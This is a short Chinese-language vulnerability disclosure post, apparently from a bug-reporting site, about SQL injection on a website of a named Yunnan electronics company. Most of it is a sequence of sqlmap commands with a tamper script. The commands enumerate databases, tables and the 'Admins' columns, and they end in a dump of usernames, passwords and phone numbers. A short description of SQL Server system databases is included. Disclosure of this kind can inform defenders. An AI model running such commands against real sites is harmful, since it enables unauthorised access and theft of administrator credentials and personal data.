雲南南天電子資訊產業股份有限公司某站SQL注入漏洞

標籤：

 220.163.13*.** [email protected]:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --dbs --tamper=space2comment --level 3 web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005    4個系統級庫master : 起主要控制的作用master資料庫控制SQL Server的所有方面。這個資料庫中包括所有的配置資訊、使用者登入資訊、當前正在伺服器中啟動並執行過程的資訊。model : 模板當你建立一個新資料庫時，SQL Server會把model資料庫中的所有對象建立一份拷貝並移到新資料庫中。tempdb : 臨時,訪問供所有來訪問你的SQL Server的使用者使用,作為使用者訪問時的容器所用.msdb : 使用者用所有的任務調度、警示、操作員都儲存在msdb資料庫中。該庫的另一個功能是用來儲存所有備份曆史。SQL Server Agent將會使用這個庫。  [email protected]:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --table -D ‘nantian_web‘ --tamper=space2comment --level 3 --threads 3   [email protected]:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --columns -T "Admins" -D ‘nantian_web‘ --tamper=space2comment --level 3 --threads 3       [email protected]:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --dump -C "id,Name,gsname,username,password,contents,tel" -T "Admins" -D ‘nantian_web‘ --tamper=space2comment --level 3 --threads 3              

雲南南天電子資訊產業股份有限公司某站SQL注入漏洞